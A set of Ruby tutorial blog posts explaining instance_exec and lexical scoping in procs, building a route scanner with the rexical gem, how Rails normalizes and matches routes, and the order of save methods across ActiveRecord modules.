Understanding instance_exec in Ruby

In Ruby, procs have lexical scoping. What does that even mean? Let’s start with a simple example.

square = lambda { x * x }
x = 20
puts square.call()
# => undefined local variable or method `x' for main:Object (NameError)

So even though a variable x exists by the time the proc is called, the proc cannot find it. When the block was defined, x had not been assigned yet, so x is not part of the scope the proc captured.

Let’s fix the code.

x = 2
square = lambda { x * x }
x = 20
puts square.call()
# => 400

This time we get an answer, but the answer is 400 instead of 4. That is because the proc's binding refers to the variable x itself, not to the value x had when the proc was created. The binding holds references to the variables in scope, not copies of their values. By the time the proc is called, x has been reassigned to 20, so the result is 400.
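To see that a proc holds on to the variable rather than a snapshot of its value, here is a small sketch. The names results, counter and increment are only for illustration. It calls the same lambda before and after reassigning x, and also shows a lambda writing to a captured variable.

```ruby
x = 2
square = lambda { x * x }

results = []
results << square.call   # x is 2 at this point
x = 20
results << square.call   # the same lambda now sees x as 20

counter = 0
increment = lambda { counter += 1 }  # assigns to the captured variable
2.times { increment.call }

p results  # => [4, 400]
p counter  # => 2
```

The lambda and the surrounding code share one variable, so a change made on either side is visible to the other.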

x does not have to be a variable. It could be a method. Check this out.

square = lambda { x * x }
def x
  20
end
puts square.call()
# => 400

In the above case x is a method. Since no local variable x was in scope when the block was defined, Ruby treats x as a method call and finds the method named x when the proc runs.

Another example of lexical binding in procs

def square(p)
   x = 2
   puts p.call
end
x = 20
square(lambda { x * x })
#=> 400

In the above case the lambda captures the outer x, which is 20 when the lambda is called. Don’t get fooled by x being 2 inside the method. A method definition starts a new scope, so the x inside the method is not the same variable as the x outside.
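One way to check which x a lambda captured is to ask its binding. The sketch below assumes Ruby 2.1 or later, where Binding#local_variable_get is available. call_with_local_x and square_of_x are hypothetical names.

```ruby
def call_with_local_x(callable)
  x = 2          # local to this method; invisible to the lambda
  callable.call
end

x = 20
square_of_x = lambda { x * x }

# Ask the lambda's binding which x it holds on to.
captured = square_of_x.binding.local_variable_get(:x)
result = call_with_local_x(square_of_x)

p captured  # => 20
p result    # => 400
```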

Issues because of lexical scoping

Here is a simple case.

class Person
  code = proc { puts self }

  define_method :name do
    code.call()
  end
end

class Developer < Person
end

Person.new.name # => Person
Developer.new.name # => Person

In the above case, when Developer.new.name is executed the output is Person, and that can cause problems. For example, Ruby on Rails uses self in a number of places to determine whether the model being acted upon uses STI. If the model uses STI then for Developer the query will have an extra where clause like AND "people"."type" IN ('Developer'). So we need a solution in which self is reported correctly for both Person and Developer.

instance_eval can change self

instance_eval can be used to change self. Here is the refactored code using instance_eval.

class Person
  code = proc { puts self }

  define_method :name do
    self.class.instance_eval &code
  end
end

class Developer < Person
end

Person.new.name #=> Person
Developer.new.name #=> Developer

The above code produces the right result. However, instance_eval has one limitation: it does not let us pass arguments to the block. Let’s change the proc to accept an argument to test this out.

class Person
  code = proc { |greetings| puts greetings; puts self }

  define_method :name do
    self.class.instance_eval 'Good morning', &code
  end
end

class Developer < Person
end

Person.new.name
Developer.new.name

#=> wrong number of arguments (1 for 0) (ArgumentError)

In the above case we get an error. That’s because instance_eval does not accept arguments for the block.

This is where instance_exec comes to the rescue. It allows us to change self and it can also pass arguments to the block.

instance_exec to the rescue

Here is the code refactored to use instance_exec.

class Person
  code = proc { |greetings| puts greetings; puts self }

  define_method :name do
    self.class.instance_exec 'Good morning', &code
  end
end

class Developer < Person
end

Person.new.name #=> Good morning Person
Developer.new.name #=> Good morning Developer

As you can see in the above code, instance_exec reports the correct self and the proc can also accept arguments.
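A common use of instance_exec is a small DSL where a caller-supplied block needs both arguments and access to the receiver's state. The Greeter class below is purely hypothetical and only sketches that idea.

```ruby
class Greeter
  def initialize(name)
    @name = name
  end

  # Runs the block with self set to this Greeter, passing the greeting along.
  def greet(greeting, &block)
    instance_exec(greeting, &block)
  end
end

message = Greeter.new("Ada").greet("Good morning") do |greeting|
  "#{greeting}, #{@name}"   # @name resolves against the Greeter instance
end

p message  # => "Good morning, Ada"
```

Without instance_exec, @name inside the block would be looked up on whatever self was when the block was written.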

Conclusion

I hope this article helps you understand why instance_exec is useful.

I scanned the Ruby on Rails source code and found around 26 usages of instance_exec. Look at how instance_exec is used there to gain more understanding of this topic.

Rex, Rexical and Rails routing

Please read Journey into Rails Routing for background on this Rails routing discussion.

A new language

Let’s say that the route definition looks like this.

/page/:id(/:action)(.:format)

The task at hand is to develop a new programming language which understands the rules of route definitions. Since this language deals with routes, let’s call it Poutes. Well, Pout sounds better, so let’s roll with that.

It all begins with a scanner

rexical is a gem which generates scanners. In other words, it is a scanner generator. Notice that rexical is not a scanner itself. It generates a scanner for the given rules. Let’s give it a try.

Create a folder called pout_language and in that folder create a file called pout_scanner.rex. Notice that the extension of the file is .rex.

class PoutScanner
end

Before we proceed any further, let’s compile to make sure it works.

$ gem install rexical
$ rex pout_scanner.rex -o pout_scanner.rb
$ ls
pout_scanner.rb pout_scanner.rex

When installing, do not run gem install rex. The gem we want is called rexical, not rex.

Time to add rules

Now it’s time to add rules to our pout_scanner.rex file.

Let’s try to develop a scanner which can tell the difference between integers and strings.

class PoutScanner
rule
  \d+         { puts "Detected number" }
  [a-zA-Z]+   { puts "Detected string" }
end

Regenerate the scanner.

$ rex pout_scanner.rex -o pout_scanner.rb

Now let’s put the scanner to the test. Let’s create pout.rb.

require './pout_scanner.rb'
class Pout
  @scanner = PoutScanner.new
  @scanner.tokenize("123")
end

You will get a NoMethodError saying undefined method `tokenize' for the PoutScanner instance.

To fix this error, open pout_scanner.rex and add an inner section like this.

class PoutScanner
rule
  \d+         { puts "Detected number" }
  [a-zA-Z]+   { puts "Detected string" }

inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens << token
    end
    tokens
  end
end

Regenerate the scanner by executing rex pout_scanner.rex -o pout_scanner.rb. Now let’s try to run the pout.rb file.

$ ruby pout.rb
Detected number

So this time we got some result.

Now let’s test for a string.

require './pout_scanner.rb'

class Pout
  @scanner = PoutScanner.new
  @scanner.tokenize("hello")
end

$ ruby pout.rb
Detected string

So the scanner correctly distinguishes strings from integers. We are going to add a lot more tests, so let’s create a test file so that we do not have to keep changing the pout.rb file.

Tests and Rake file

This is our pout_test.rb file.

require 'test/unit'
require './pout_scanner'

class PoutTest  < Test::Unit::TestCase
  def setup
    @scanner = PoutScanner.new
  end

  def test_standalone_string
    assert_equal [[:STRING, 'hello']], @scanner.tokenize("hello")
  end
end

And this is our Rakefile.

require 'rake'
require 'rake/testtask'

task :generate_scanner do
  `rex pout_scanner.rex -o pout_scanner.rb`
end

task :default => [:generate_scanner, :test_units]

desc "Run basic tests"
Rake::TestTask.new("test_units") { |t|
  t.pattern = '*_test.rb'
  t.verbose = true
  t.warning = true
}

Also, let’s change the pout_scanner.rex file to return an array instead of calling puts. The array contains the type of the element and its value.

class PoutScanner
rule
  \d+         { [:INTEGER, text.to_i] }
  [a-zA-Z]+   { [:STRING, text] }

inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens << token
    end
    tokens
  end
end

With all this setup, all we need to do now is write a test and run rake.

Tests for integer

I added the following test and it passed.

def test_standalone_integer
  assert_equal [[:INTEGER, 123]], @scanner.tokenize("123")
end

However, the following test failed.

def test_string_and_integer
  assert_equal [[:STRING, 'hello'], [:INTEGER, 123]], @scanner.tokenize("hello 123")
end

The test fails with the following message.

  1) Error:
test_string_and_integer(PoutTest):
PoutScanner::ScanError: can not match: ' 123'

Notice that in the error message there is a space before 123. The scanner does not know how to handle whitespace. Let’s fix that.

Here is the updated rule. We do not want any action to be taken when whitespace is detected. Now the test passes.

class PoutScanner
rule
  \s+
  \d+         { [:INTEGER, text.to_i] }
  [a-zA-Z]+   { [:STRING, text] }

inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens << token
    end
    tokens
  end
end

Back to routing business

Now that we have some background on how scanning works, let’s get back to the business at hand. The task is to properly parse a routing statement like /page/:id(/:action)(.:format).

Test for slash

The simplest route is just /. Let’s write a test and then a rule for it.

require 'test/unit'
require './pout_scanner'

class PoutTest  < Test::Unit::TestCase
  def setup
    @scanner = PoutScanner.new
  end

  def test_just_slash
    assert_equal [[:SLASH, '/']], @scanner.tokenize("/")
  end

end

And here is the .rex file.

class PoutScanner
rule
  \/         { [:SLASH, text] }

inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens << token
    end
    tokens
  end
end

Test for /page

Here is the test for /page.

def test_slash_and_literal
  assert_equal [[:SLASH, '/'], [:LITERAL, 'page']] , @scanner.tokenize("/page")
end

And here is the rule that was added.

  [a-zA-Z]+  { [:LITERAL, text] }

Test for /:page

Here is the test for /:page.

def test_slash_and_symbol
  assert_equal [[:SLASH, '/'], [:SYMBOL, ':page']] , @scanner.tokenize("/:page")
end

And here are the rules.

rule
  \/          { [:SLASH, text]   }
  \:[a-zA-Z]+ { [:SYMBOL, text]  }
  [a-zA-Z]+   { [:LITERAL, text] }

Test for /(:page)

Here is the test for /(:page).

def test_symbol_with_paran
  assert_equal  [[[:SLASH, '/'], [:LPAREN, '('],  [:SYMBOL, ':page'], [:RPAREN, ')']]] , @scanner.tokenize("/(:page)")
end

And here is the new rule.

  \/\(\:[a-z]+\) { [ [:SLASH, '/'], [:LPAREN, '('], [:SYMBOL, text[2..-2]], [:RPAREN, ')']] }

We’ll stop here and look at the final set of files.

Final files

This is the Rakefile.

require 'rake'
require 'rake/testtask'

task :generate_scanner do
  `rex pout_scanner.rex -o pout_scanner.rb`
end

task :default => [:generate_scanner, :test_units]

desc "Run basic tests"
Rake::TestTask.new("test_units") { |t|
  t.pattern = '*_test.rb'
  t.verbose = true
  t.warning = true
}

This is pout_scanner.rex.

class PoutScanner
rule
  \/\(\:[a-z]+\) { [ [:SLASH, '/'], [:LPAREN, '('], [:SYMBOL, text[2..-2]], [:RPAREN, ')']] }
  \/          { [:SLASH, text]   }
  \:[a-zA-Z]+ { [:SYMBOL, text]  }
  [a-zA-Z]+   { [:LITERAL, text] }

inner
  def tokenize(code)
    scan_setup(code)
    tokens = []
    while token = next_token
      tokens << token
    end
    tokens
  end
end

This is pout_test.rb.

require 'test/unit'
require './pout_scanner'

class PoutTest  < Test::Unit::TestCase
  def setup
    @scanner = PoutScanner.new
  end

  def test_just_slash
    assert_equal [[:SLASH, '/']] , @scanner.tokenize("/")
  end

  def test_slash_and_literal
    assert_equal [[:SLASH, '/'], [:LITERAL, 'page']] , @scanner.tokenize("/page")
  end

  def test_slash_and_symbol
    assert_equal [[:SLASH, '/'], [:SYMBOL, ':page']] , @scanner.tokenize("/:page")
  end

  def test_symbol_with_paran
    assert_equal  [[[:SLASH, '/'], [:LPAREN, '('],  [:SYMBOL, ':page'], [:RPAREN, ')']]] , @scanner.tokenize("/(:page)")
  end
end

How scanner works

Here we used rex to generate the scanner. Now take a look at the generated pout_scanner.rb file and study the code. It is only 91 lines long.

If you look at the code, it is clear that scanning is not that hard. You can hand-roll a scanner without using a tool like rex, and that’s exactly what Aaron Patterson did in Journey: he hand-rolled the scanner.
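To give a feel for what hand-rolling involves, here is a minimal sketch built on StringScanner from Ruby's standard library. It is not Journey's scanner. HandRolledPoutScanner is a hypothetical class, the DOT token name is an assumption, and unlike the combined rule used earlier it emits parentheses as separate tokens.

```ruby
require 'strscan'

# Hypothetical hand-rolled counterpart to the generated PoutScanner.
class HandRolledPoutScanner
  RULES = [
    [/\//,         :SLASH],
    [/\(/,         :LPAREN],
    [/\)/,         :RPAREN],
    [/\./,         :DOT],       # DOT is an assumed token name
    [/:[a-zA-Z]+/, :SYMBOL],
    [/[a-zA-Z]+/,  :LITERAL]
  ].freeze

  def tokenize(code)
    scanner = StringScanner.new(code)
    tokens = []
    until scanner.eos?
      # Find the first rule that matches at the current position.
      pattern, type = RULES.find { |regexp, _| scanner.match?(regexp) }
      raise ArgumentError, "can not match: '#{scanner.rest}'" unless pattern
      tokens << [type, scanner.scan(pattern)]
    end
    tokens
  end
end

tokens = HandRolledPoutScanner.new.tokenize("/page/:id(.:format)")
p tokens
# => [[:SLASH, "/"], [:LITERAL, "page"], [:SLASH, "/"], [:SYMBOL, ":id"],
#     [:LPAREN, "("], [:DOT, "."], [:SYMBOL, ":format"], [:RPAREN, ")"]]
```

The rules are tried in order, just as in the .rex file, so the order of the RULES table matters.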

Conclusion

In this blog we saw how to use rex to build a scanner that reads our routing statements. In the next blog we’ll see how to parse the routing statement and how to find the matching routing statement for a given URL.

Journey into Rails Routing -- an under the hood look at how routing works

The following code was tested with edge Rails (Rails 4).

When a Rails application boots, it reads the config/routes.rb file. In your routes you might have code like this.

Rails4demo::Application.routes.draw do
  root 'users#index'
  resources :users
  get 'photos/:id' => 'photos#show', :defaults => { :format => 'jpg' }
  get '/logout' => 'sessions#destroy', :as => :logout
  get "/stories" => redirect("/photos")
end

In the above case there are five different routing statements. Rails needs to store all those routes in such a manner that later, when the URL is /photos/5, it is able to find the route statement that should handle the request.

In this article we are going to take a peek at how Rails handles the whole routing business.

Normalization in action

In order to compare routing statements, all of them first need to be normalized to a standard format so that one route statement can easily be compared with another.

Before we take a deep dive into how the normalization works, let’s first see some normalizations in action.

get call with defaults

Here we have the following route.

Rails4demo::Application.routes.draw do
  get 'photos/:id' => 'photos#show', :defaults => { :format => 'jpg' }
end

After the normalization process the above routing statement is transformed into six different values. All six are shown below.

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007fd05e0cf7e8
           @defaults={:format=>"jpg", :controller=>"photos", :action=>"show"},
           @glob_param=nil,
           @controller_class_names=#<ThreadSafe::Cache:0x007fd05e0cf7c0
           @backend={},
           @default_proc=nil>>
conditions: {:path_info=>"/photos/:id(.:format)", :required_defaults=>[:controller, :action], :request_method=>["GET"]}
requirements: {}
defaults: {:format=>"jpg", :controller=>"photos", :action=>"show"}
as: nil
anchor: true

app is the application that will be executed if the conditions are met. conditions holds the conditions a request must satisfy. Pay attention to :path_info in conditions: Rails uses it to determine the right route statement. defaults holds the default parameter values, and requirements holds the constraints.

GET call with as

Here we have the following route.

Rails4demo::Application.routes.draw do
  get '/logout' => 'sessions#destroy', :as => :logout
end

After normalization the above code gets the following values.

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f8ded87e740
           @defaults={:controller=>"sessions", :action=>"destroy"},
           @glob_param=nil,
           @controller_class_names=#<ThreadSafe::Cache:0x007f8ded87e718 @backend={},
           @default_proc=nil>>
conditions: {:path_info=>"/logout(.:format)", :required_defaults=>[:controller, :action], :request_method=>["GET"]}
requirements: {}
defaults: {:controller=>"sessions", :action=>"destroy"}
as: "logout"
anchor: true

Notice that in the above case as is populated with logout.

root call

Here we have the following route.

Rails4demo::Application.routes.draw do
  root 'users#index'
end

After normalization the above code gets the following values.

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007fe91507f278
           @defaults={:controller=>"users", :action=>"index"},
           @glob_param=nil,
           @controller_class_names=#<ThreadSafe::Cache:0x007fe91507f250 @backend={},
           @default_proc=nil>>
conditions: {:path_info=>"/", :required_defaults=>[:controller, :action], :request_method=>["GET"]}
requirements: {}
defaults: {:controller=>"users", :action=>"index"}
as: "root"
anchor: true

Notice that in the above case as is populated with root, and path_info is / since this is the root URL.

GET call with constraints

Here we have the following route.

Rails4demo::Application.routes.draw do
  get 'pictures/:id' => 'pictures#show', :constraints => { :id => /[A-Z]\d{5}/ }
end

After normalization the above code gets the following values.

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f8158e052c8
           @defaults={:controller=>"pictures", :action=>"show"},
           @glob_param=nil,
           @controller_class_names=#<ThreadSafe::Cache:0x007f8158e05278 @backend={},
           @default_proc=nil>>
conditions: {:path_info=>"/pictures/:id(.:format)", :required_defaults=>[:controller, :action], :request_method=>["GET"]}
requirements: {:id=>/[A-Z]\d{5}/}
defaults: {:controller=>"pictures", :action=>"show"}
as: nil
anchor: true

Notice that in the above case requirements is populated with the constraints mentioned in the route definition.

get with a redirect

Here we have the following route.

Rails4demo::Application.routes.draw do
  get "/stories" => redirect("/posts")
end

After normalization the above code gets the following values.

app: redirect(301, /posts)
conditions: {:path_info=>"/stories(.:format)", :required_defaults=>[], :request_method=>["GET"]}
requirements: {}
defaults: {}
as: "stories"
anchor: true

Notice that in the above case app is a simple redirect.

Resources

Here we have the following route.

Rails4demo::Application.routes.draw do
  resources :users
end

After normalization the above code gets the following values.

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41a315c0
           @defaults={:action=>"index", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d41a31598 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users(.:format)", :required_defaults=>[:action, :controller], :request_method=>["GET"]}
defaults: {:action=>"index", :controller=>"users"}
as: "users"

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41a4ef80
           @defaults={:action=>"create", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d41a4ef58 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users(.:format)", :required_defaults=>[:action, :controller], :request_method=>["POST"]}
defaults: {:action=>"create", :controller=>"users"}
as: nil

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41b63790
           @defaults={:action=>"new", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d41b63768 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/new(.:format)", :required_defaults=>[:action, :controller], :request_method=>["GET"]}
defaults: {:action=>"new", :controller=>"users"}
as: "new_user"

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41a10550
           @defaults={:action=>"edit", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d41a10528 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/:id/edit(.:format)", :required_defaults=>[:action, :controller], :request_method=>["GET"]}
defaults: {:action=>"edit", :controller=>"users"}
as: "edit_user"

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41f31818
           @defaults={:action=>"show", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d41f317f0 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/:id(.:format)", :required_defaults=>[:action, :controller], :request_method=>["GET"]}
defaults: {:action=>"show", :controller=>"users"}
as: "user"

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d44a9bb70
           @defaults={:action=>"update", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d44a9bb48 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/:id(.:format)", :required_defaults=>[:action, :controller], :request_method=>["PATCH"]}
defaults: {:action=>"update", :controller=>"users"}
as: nil

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d41b17480
           @defaults={:action=>"update", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d41b17458 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/:id(.:format)", :required_defaults=>[:action, :controller], :request_method=>["PUT"]}
defaults: {:action=>"update", :controller=>"users"}
as: nil

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007f9d439ddf68
           @defaults={:action=>"destroy", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007f9d439ddf40 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/:id(.:format)", :required_defaults=>[:action, :controller], :request_method=>["DELETE"]}
defaults: {:action=>"destroy", :controller=>"users"}
as: nil

In this case I omitted requirements and anchor for brevity.

Notice that a single routing statement, resources :users, created eight normalized routing statements. It means that a resources statement is basically a shortcut for defining all eight of those routing statements.

Resources with only

Here we have the following route.

Rails4demo::Application.routes.draw do
  resources :users, only: :new
end

After normalization the above code gets the following values.

app: #<ActionDispatch::Routing::RouteSet::Dispatcher:0x007fdf55043e40
           @defaults={:action=>"new", :controller=>"users"}, @glob_param=nil, @controller_class_names=#<ThreadSafe::Cache:0x007fdf55043e18 @backend={}, @default_proc=nil>>
conditions: {:path_info=>"/users/new(.:format)", :required_defaults=>[:action, :controller], :request_method=>["GET"]}
defaults: {:action=>"new", :controller=>"users"}
as: "new_user"

Because of the only option, just one routing statement was produced in this case.

Mapper

In Rails the ActionDispatch::Routing::Mapper class is responsible for normalizing all routing statements.

module ActionDispatch
  module Routing
    class Mapper
      include Base
      include HttpHelpers
      include Redirection
      include Scoping
      include Concerns
      include Resources
    end
  end
end

Now let’s look at what these included modules do.

Base

module Base
  def root(options = {})
  end

  def match
  end

  def mount(app, options = {})
  end
end

As you can see, Base handles root, match and mount calls.

HttpHelpers

module HttpHelpers
  def get(*args, &block)
  end

  def post(*args, &block)
  end

  def patch(*args, &block)
  end

  def put(*args, &block)
  end

  def delete(*args, &block)
  end
end

HttpHelpers handles get, post, patch, put and delete.

Scoping

module Scoping
  def scope(*args)
  end

  def namespace(path, options = {})
  end

  def constraints(constraints = {})
  end
end

Resources

module Resources
  def resource(*resources, &block)
  end

  def resources(*resources, &block)
  end

  def collection
  end

  def member
  end

  def shallow
  end
end

Let’s put all the routes together

So now let’s look at all the route definitions together.

Rails4demo::Application.routes.draw do
  root 'users#index'
  get 'photos/:id' => 'photos#show', :defaults => { :format => 'jpg' }
  get '/logout' => 'sessions#destroy', :as => :logout
  get 'pictures/:id' => 'pictures#show', :constraints => { :id => /[A-Z]\d{5}/ }
  get "/stories" => redirect("/posts")
  resources :users
end

The above route definitions produce the following information. I am going to show only the path info, plus the request method for the resources routes.

{ :path_info=>"/" }

{ :path_info=>"/photos/:id(.:format)" }

{ :path_info=>"/logout(.:format)" }

{ :path_info=>"/pictures/:id(.:format)" }

{ :path_info=>"/stories(.:format)" }

{ :path_info=>"/users(.:format)", :request_method=>["GET"] }

{ :path_info=>"/users(.:format)", :request_method=>["POST"] }

{ :path_info=>"/users/new(.:format)", :request_method=>["GET"] }

{ :path_info=>"/users/:id/edit(.:format)", :request_method=>["GET"] }

{ :path_info=>"/users/:id(.:format)", :request_method=>["GET"] }

{ :path_info=>"/users/:id(.:format)", :request_method=>["PATCH"] }

{ :path_info=>"/users/:id(.:format)", :request_method=>["PUT"] }

{ :path_info=>"/users/:id(.:format)", :request_method=>["DELETE"] }

How to find the matching route definition

Now that we have normalized the routing definitions, the task at hand is to find the right route definition for a given URL and request method.

For example, if the requested page is /pictures/A12345 then the matching routing definition should be get 'pictures/:id' => 'pictures#show', :constraints => { :id => /[A-Z]\d{5}/ }.

In order to accomplish that I would do something like this.

I would convert each path info into a regular expression and push that regular expression into an array. So in this case I would have 13 regular expressions in the array, one per normalized route, and for a given URL I would try to match them one by one.

This strategy will work, and this is how Rails worked all the way up to Rails 3.1.
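The array-of-regular-expressions strategy can be sketched in plain Ruby as follows. This is only an illustration of the idea, not how Rails implemented it. path_to_regexp and find_route are hypothetical helpers, and the route list is a shortened, hand-picked subset of the routes above.

```ruby
# Hypothetical helper: turns a normalized path such as "/users/:id(.:format)"
# into an anchored regular expression with named captures.
def path_to_regexp(path)
  source = path.gsub(/\(|\)|\.|:([a-z_]+)/) do |token|
    case token
    when "(" then "(?:"                 # optional group opens
    when ")" then ")?"                  # optional group closes
    when "." then "\\."                 # literal dot
    else "(?<#{$1}>[^/.?]+)"            # :name becomes a named capture
    end
  end
  Regexp.new("\\A#{source}\\z")
end

# Tries each route in order and returns the first target that matches.
def find_route(routes, verb, url)
  routes.each do |route_verb, regexp, target, requirements|
    next unless route_verb == verb
    match = regexp.match(url)
    next unless match
    next unless requirements.all? { |name, pattern| pattern.match?(match[name].to_s) }
    return target
  end
  nil
end

routes = [
  ["GET", "/users/new(.:format)",    "users#new",     {}],
  ["GET", "/users/:id(.:format)",    "users#show",    {}],
  ["GET", "/pictures/:id(.:format)", "pictures#show", { "id" => /\A[A-Z]\d{5}\z/ }]
].map { |verb, path, target, reqs| [verb, path_to_regexp(path), target, reqs] }

p find_route(routes, "GET", "/pictures/A12345")  # => "pictures#show"
p find_route(routes, "GET", "/pictures/123")     # => nil
p find_route(routes, "GET", "/users/new")        # => "users#new"
p find_route(routes, "GET", "/users/5.json")     # => "users#show"
```

Because the routes are tried one by one, order matters: /users/new has to come before /users/:id, and lookup time grows with the number of routes.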

Aaron Patterson loves computer science

Aaron Patterson noticed that finding the best matching route definition for a given URL is nothing but a pattern matching task. Computer science has solved this problem much more elegantly, and the solution also happens to run faster: build an AST and walk over it.

So he decided to make a mini language out of the route definitions. After all, the route definitions we write follow certain rules.

And thus Journey was born.

In the next blog we will see how to write grammar rules for routing definitions, how to parse them, and how to walk the AST to find the best match.

Life of save in ActiveRecord

The following code was tested with edge Rails (Rails 4).

In a Ruby on Rails application we save records often. save is one of the most used methods in ActiveRecord. In this blog we are going to take a look at the life cycle of the save operation.

ActiveRecord::Base

A typical model looks like this.

class Article < ActiveRecord::Base
end

Now let’s look at the ActiveRecord::Base class in its entirety.

module ActiveRecord
  class Base
    extend ActiveModel::Naming

    extend ActiveSupport::Benchmarkable
    extend ActiveSupport::DescendantsTracker

    extend ConnectionHandling
    extend QueryCache::ClassMethods
    extend Querying
    extend Translation
    extend DynamicMatchers
    extend Explain

    include Persistence
    include ReadonlyAttributes
    include ModelSchema
    include Inheritance
    include Scoping
    include Sanitization
    include AttributeAssignment
    include ActiveModel::Conversion
    include Integration
    include Validations
    include CounterCache
    include Locking::Optimistic
    include Locking::Pessimistic
    include AttributeMethods
    include Callbacks
    include Timestamp
    include Associations
    include ActiveModel::SecurePassword
    include AutosaveAssociation
    include NestedAttributes
    include Aggregations
    include Transactions
    include Reflection
    include Serialization
    include Store
    include Core
  end

  ActiveSupport.run_load_hooks(:active_record, Base)
end

The Base class extends and includes a lot of modules. Here we are going to look at the four modules that define a save method.

module ActiveRecord
  class Base
    ......................
    include Persistence
    .......................
    include Validations
    ........................
    include AttributeMethods
    ........................
    include Transactions
    ........................
  end
end

include Persistence

The Persistence module defines the save method like this.

def save(*)
  create_or_update
rescue ActiveRecord::RecordInvalid
  false
end

Now let’s look at the create_or_update method.

def create_or_update
  raise ReadOnlyRecord if readonly?
  result = new_record? ? create_record : update_record
  result != false
end

So the save method invokes create_or_update, and create_or_update either creates a new record or updates an existing one. Dead simple.

include Validations

In module Validations the save method is defined as

def save(options={})
  perform_validations(options) ? super : false
end

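In this case the save method first calls perform_validations. If validation passes it calls super, which moves on to the next save method in the chain. Otherwise it returns false.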

include AttributeMethods

The AttributeMethods module includes a bunch of modules like this.

module ActiveRecord
  module AttributeMethods
    extend ActiveSupport::Concern
    include ActiveModel::AttributeMethods

    included do
      include Read
      include Write
      include BeforeTypeCast
      include Query
      include PrimaryKey
      include TimeZoneConversion
      include Dirty
      include Serialization
    end
  end
end

Here we want to look at the Dirty module, which defines the save method as follows.

def save(*)
  if status = super
    @previously_changed = changes
    @changed_attributes.clear
  end
  status
end

Since this module is all about tracking whether a record is dirty or not, its save method records the changes once the save succeeds and then clears the list of changed attributes.

include Transactions

In module Transactions the save method is defined as

def save(*) #:nodoc:
  rollback_active_record_state! do
    with_transaction_returning_status { super }
  end
end

The method rollback_active_record_state! is defined as

def rollback_active_record_state!
  remember_transaction_record_state
  yield
rescue Exception
  restore_transaction_record_state
  raise
ensure
  clear_transaction_record_state
end

And the method with_transaction_returning_status is defined as

def with_transaction_returning_status
  status = nil
  self.class.transaction do
    add_to_transaction
    begin
      status = yield
    rescue ActiveRecord::Rollback
      @_start_transaction_state[:level] = (@_start_transaction_state[:level] || 0) - 1
      status = nil
    end

    raise ActiveRecord::Rollback unless status
  end
  status
end

Together, the methods rollback_active_record_state! and with_transaction_returning_status ensure that all the operations happening inside save happen in a single transaction.

Why the save method needs to be in a transaction

A model can define a number of callbacks, including before_save and after_save. All those callbacks run within the transaction. It means that if an after_save callback raises an exception then the save operation is rolled back.

Not only that, a number of associations like has_many and belongs_to use callbacks to handle association manipulation. To ensure the integrity of the whole operation, save is wrapped in a transaction.
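The remember, yield, restore-on-exception shape of rollback_active_record_state! can be sketched without a database. The class below is hypothetical and only restores in-memory state. It does not open a real transaction, and with_state_rollback is an assumed name.

```ruby
class SketchRecord
  attr_accessor :title

  def initialize(title)
    @title = title
  end

  # Hypothetical, simplified stand-in for rollback_active_record_state!
  def with_state_rollback
    remembered_title = title     # remember the state before the block runs
    yield
  rescue Exception
    self.title = remembered_title  # restore it if anything goes wrong
    raise                          # and let the caller see the failure
  end
end

record = SketchRecord.new("draft")
begin
  record.with_state_rollback do
    record.title = "published"
    raise "after_save callback failed"
  end
rescue RuntimeError => error
  failure = error.message
end

p record.title  # => "draft"
p failure       # => "after_save callback failed"
```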

reverse order of operation

In the Base class the modules are included in the following order.

module ActiveRecord
  class Base
    ......................
    include Persistence
    .......................
    include Validations
    ........................
    include AttributeMethods
    ........................
    include Transactions
    ........................
  end
end

All four modules have a save method. Because of the way Ruby resolves methods, the last module to be included gets to act on the method first, and each call to super moves on to the module included before it. So the order in which the save methods get executed is Transactions, AttributeMethods, Validations and Persistence.
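The same lookup order can be reproduced with plain modules. The Sketch-prefixed names below are hypothetical stand-ins, not the real ActiveRecord modules. Each save records its name in a log and then hands over to super.

```ruby
module SketchPersistence
  def save(log)
    log << "persistence"
    true
  end
end

module SketchValidations
  def save(log)
    log << "validations"
    super
  end
end

module SketchTransactions
  def save(log)
    log << "transactions"
    super
  end
end

class SketchModel
  include SketchPersistence
  include SketchValidations
  include SketchTransactions   # included last, so it is consulted first
end

log = []
SketchModel.new.save(log)

p log
# => ["transactions", "validations", "persistence"]
p SketchModel.ancestors.first(4)
# => [SketchModel, SketchTransactions, SketchValidations, SketchPersistence]
```

The ancestors list is the order in which Ruby looks for a method, which is why it mirrors the order of the log.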

